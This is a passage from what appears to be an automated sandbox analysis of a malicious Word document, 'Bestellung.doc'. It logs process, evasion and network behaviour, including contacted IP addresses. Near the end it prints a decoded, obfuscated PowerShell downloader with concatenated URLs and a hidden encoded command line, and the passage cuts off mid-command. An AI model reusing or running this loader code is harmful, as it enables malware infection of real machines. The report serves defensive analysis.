                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002906C4 push 002906F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025D6DC push 0025D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258748 push 00258774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025D754 push 0025D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0025E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002937A8 push 002937E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00258798 push 002587C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002907E4 push 00290827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00290834 push 00290860h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0029086C push 00290898h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv:Zone.Identifier read attributes | delete
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 7080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49175
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: Bestellung.docStream path 'office' entropy: 7.95165191987 (max. 8.0)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001F27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001D27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002F27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003027EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 70.32.89.105 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 203.157.152.9 168
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 132.248.38.158 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 110.172.180.180 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 157.245.145.87 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 190.55.186.229 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 161.49.84.2 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcAL